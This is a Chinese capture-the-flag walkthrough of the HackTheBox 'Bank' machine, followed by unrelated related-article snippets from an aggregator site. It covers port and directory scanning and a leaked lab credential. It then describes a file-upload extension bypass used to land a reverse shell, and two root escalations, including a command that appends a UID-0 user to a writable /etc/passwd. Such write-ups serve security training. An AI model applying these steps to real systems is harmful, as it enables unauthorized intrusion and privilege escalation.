HackTheBox-Machines--Bank

文章目录

  • 0x01 信息收集
  • 0x02 文件上传漏洞利用
  • 0x03 权限提升
    • 方法一:SUID提权
    • 方法二:配置不当提权

Bank 测试过程

0x01 信息收集


1.端口扫描

发现 ssh(22)、DNS(53)、HTTP(80) 端口

nmap -sC -sV 10.129.29.200

在这里插入图片描述

访问 80 端口,页面为Apache2 Ubuntu 默认页面

在这里插入图片描述

猜测域名可能为 bank.htb

echo "10.129.29.200 bank.htb" | sudo tee -a /etc/hosts

  访问 bank.htb 重定向到 bank.htb/login.php
  登录表单尝试:爆破、sql注入失败,尝试进行其他方式。
在这里插入图片描述

2. 目录扫描

./gobuster dir -u http://bank.htb -w directory-list-2.3-medium.txt -x php -t 50 
  • /support.php 重定向到 login.php。

  • /uploads 重定向到 /uploads/,并且返回 403 禁止的页面。

  • /assets 重定向到 /assets/启用了目录列表的位置。

  • /inc 重定向到/inc/

  • header.php 返回 302 login.php,这会导致浏览器转到/inc/login.php不存在的位置。我怀疑所有页面都有这个标头,它检查有效会话,如果没有则重定向。其他三个返回空页(这是有道理的,因为它们应该被包含在内)。

  • /balance-transfer 提供了一个包含很多.acc文件的目录列表,每个文件都是32个十六进制字符。

在这里插入图片描述

在这里插入图片描述

Christos Christopoulos:chris@bank.htb:!##HTBB4nkP4ssw0rd!##

在这里插入图片描述

在这里插入图片描述

0x02 文件上传漏洞利用

1. 文件上传功能利用

  上传 phpinfo.php 文件,上传失败,显示只能上传 image 文件。

在这里插入图片描述

2. 绕过文件上传限制

  使用burpsuite抓包,尝试绕过对上传文件的限制。失败

  在检查http://bank.htb/support.php网页源代码时发现一条注释:
  以.htb文件会以php格式运行

在这里插入图片描述

  将 phpinfo.php 改为 phpinfo.htb 继续尝试,成功绕过上传限制

在这里插入图片描述
在这里插入图片描述

3. 上传反弹shell,获取权限

  服务端执行监听,上传反弹 shell 文件,上传成功后点击Click Here 成功执行shell文件,获取到权限

在这里插入图片描述

在这里插入图片描述

0x03 权限提升

1. 将shell升级为PTY

python -c 'import pty;pty.spawn("bash")'

在这里插入图片描述

在这里插入图片描述

方法一:SUID提权

  1.检查以root权限运行具有SUID权限的二进制文件

find / -type f -user root -perm -4000 2>/dev/null

在这里插入图片描述

  2.运行 /var/htb/bin/emergency 会返回root
在这里插入图片描述

方法二:配置不当提权

  1.检查密码文件,发现 passwd文件任何人都可写
在这里插入图片描述

  2.使用openssl为密码 password 生成密码哈希

openssl passwd -1 password

在这里插入图片描述

  3.添加一个 uid 和 gid 为0的 root 用户

echo 'test123:$1$JW6KCfwL$atWohn9aRfb/uLULAQkSX1:0:0:pwned:/root:/bin/bash' >> /etc/passwd

上述命令的格式是冒号分隔的用户名(不能以数字开头)、密码哈希、用户 ID、组 ID、注释、主目录、shell。

在这里插入图片描述

  4.使用 su 切换到test123用户,获取root权限
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/329255.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

非授权人员进入报警系统

非授权人员进入报警系统基于智能视频分析技术和深度学习技术,非授权人员进入报警系统通过现场已经装好的监控摄像头针对人体进行精准检测,并根据设置的禁入区范围进行判断。通过图像处理和人体识别算法,非授权人员进入报警系统可以在实时监测…

鸿蒙HarmonyOS开发中的易混点归纳-持续补充中

相关文章目录 鸿蒙HarmonyOS开发术语全解:小白也能看懂! 文章目录 相关文章目录前言一、build()函数和Builder装饰器?二、自定义组件和系统组件(内置组件)三、组件和页面四、自定义弹窗和其他弹窗总结 前言 一、build…

一个通过ADC采集NTC热敏电阻的温度传感器

前言: 如何设计一个电路,使用具有逐次逼近寄存器(SAR)模数转换器(ADC)的热敏电阻直接监测温度呢?温度传感电路需要使用负温度系数(NTC)热敏电阻与电阻器串联形成分压器,监测-25C至100C的温度范围。分压器具有产生与监测的温度成反比的输出电压的效果。电阻器分压器的…

Flink 高可用之StandAlone-HA模式(一)

obManager存在单点故障(SPOF:Single Point Of Failure),因此对Flink做HA,主要是对JobManager做HA,根据Flink集群的部署模式不同,分为Standalone、OnYarn,本文主要涉及Standalone模式…

R语言数据分析案例-巴西固体燃料排放量预测与分析

1 背景 自18世纪中叶以来,由于快速城市化、人口增长和技术发展,导致一氧化二氮(N2O)、 甲烷(CH4)和二氧化碳(CO 2)等温室气体浓度急剧上升,引发了全球变暖、海平面上 升…

别说废话!说话说到点上,项目高效沟通的底层逻辑揭秘

假设你下周要在领导和同事面前汇报项目进度,你会怎么做?很多人可能会去网上搜一个项目介绍模板,然后按照模板来填充内容。最后,汇报幻灯片做了 80 页,自己觉得非常充实,但是却被领导痛批了一顿。 这样的境…

景源畅信电商:抖店怎么提高店铺的权重?

在竞争激烈的电商市场,如何提升抖店店铺权重成为商家关注的焦点。店铺权重是决定商品搜索排名的关键因素之一,直接关系到店铺流量和销量。提高店铺权重并非一蹴而就,而是一个系统工程,需要从多个维度着手优化。 一、优化商品标题和…

(二)vForm 动态表单设计器之下拉、选择

系列文章目录 (一)vForm 动态表单设计器之使用 目录 系列文章目录 前言 一、后端需提供接口 二、组件配置 总结 前言 动态表单下拉、选择等组件,大概率要使用数据库中的数据,那么vForm如何拿到数据库中的数据呢?跟随…

Java ( 框架界面 , 按钮 , 动作监听ActionListener ,鼠标监听MouseListener,键盘监听KeyListener)的使用方法

package 拼图阶段任务.ui;import javax.swing.*; import java.awt.*; import java.awt.event.*;public class UseMethod {public static void main(String[] args) { // 框架的用法JFrame jf new JFrame();// 设置界面的宽高jf.setSize(603,680);// 设置界面的标题jf.setTitle…

Linux: network: send 失败的时候要不要close socket?

最近遇到一个例子,说有zerowindow出现;出现的原因是接收方的CPU被其他程序吃光,导致socket的read函数处理非常慢。说明接收端的接收缓存不够用。发送端自然而然的要停止发送。 但是如果在接收方的recv buff,以及发送方的send buf…

智能车竞赛指南:从零到一,驶向自动驾驶的未来

智能车竞赛指南:从零到一,驶向自动驾驶的未来 一、智能车竞赛概览1.1 竞赛介绍1.2 竞赛分类 二、智能车开发技术基础2.1 硬件平台2.2 软件开发 三、实战案例:循线小车开发3.1 系统架构3.2 代码示例 四、技术项目:基于ROS的视觉导航…

PersonalLLM——探索LLM是否能根据五大人格特质重新塑造一个新的角色?

1.概述 近年来,大型语言模型(LLMs),例如ChatGPT,致力于构建能够辅助人类的个性化人工智能代理,这些代理以进行类似人类的对话为重点。在学术领域,尤其是社会科学中,一些研究报告已经…

Nacos 进阶篇---Nacos服务端怎么维护不健康的微服务实例 ?(七)

一、引言 在 Nacos 后台管理服务列表中,我们可以看到微服务列表,其中有一栏叫“健康实例数” (如下图),表示对应的客户端实例信息是否可用状态。 那Nacos服务端是怎么感知客户端的状态是否可用呢 ? 本章…

JAVA 中 HTTP 基本认证(Basic Authentication)

目录 服务端这么做服务端告知客户端使用 Basic Authentication 方式进行认证服务端接收并处理客户端按照 Basic Authentication 方式发送的数据 客户端这么做如果客户端是浏览器如果客户端是 RestTemplat如果客户端是 HttpClient 其它参考 服务端这么做 服务端告知客户端使用 …

Unity数据持久化2——XML

简介: 基础知识 XML文件格式 XML基本语法 XML属性 练习: C#读取存储XML XML文件存放位置 读取XML文件 练习: 存储修改XML文件 练习: 总结 实践小项目 必备知识点 必备知识点——C#中XML序列化 必备知识点——C#中XML反序列化 必备…

5.23-

回顾 I0多路复用的原理? 程序首先向操作系统发起一个IO多路复用请求,告诉操作系统需要监视哪些IO通道。这些IO通道可以包括网络套接字、文件描述符等操作系统随后会将这些IO通道放入一个队列中,并在某个IO通道就绪时(如数据到达、文件可读…

Servlet的request对象

request对象的继承关系 1.HttpServletRequest接口继承了ServletRequest接口,对其父接口进行了扩展,可以处理满足所有http协议的请求 2.HttpServletRequest和ServletRequest都是接口,不能创建对象,因此在tomcat底层定义实现类并创…

Mysql总结1

Mysql常见日志 (1)错误日志:记录数据库服务器启动、停止、运行时存在的问题; (2)慢查询日志:记录查询时间超过long_query_time的sql语句,其中long_query_time可配置,且…

Python 机器学习 基础 之 数据表示与特征工程 【单变量非线性变换 / 自动化特征选择/利用专家知识】的简单说明

Python 机器学习 基础 之 数据表示与特征工程 【单变量非线性变换 / 自动化特征选择/利用专家知识】的简单说明 目录 Python 机器学习 基础 之 数据表示与特征工程 【单变量非线性变换 / 自动化特征选择/利用专家知识】的简单说明 一、简单介绍 二、单变量非线性变换 三、自…

园区网的基本了解

园区网使用的典型技术---IEEE802.3标准/IEEE802.11标准 封闭式园区网络 ---由内部人员使用,不能访问互联网。 ---制订各式各样的规章制度 ---NAC,网络接入控制 开放式园区网络 ---服务于公众的,认证 园区网的发展 第一代:…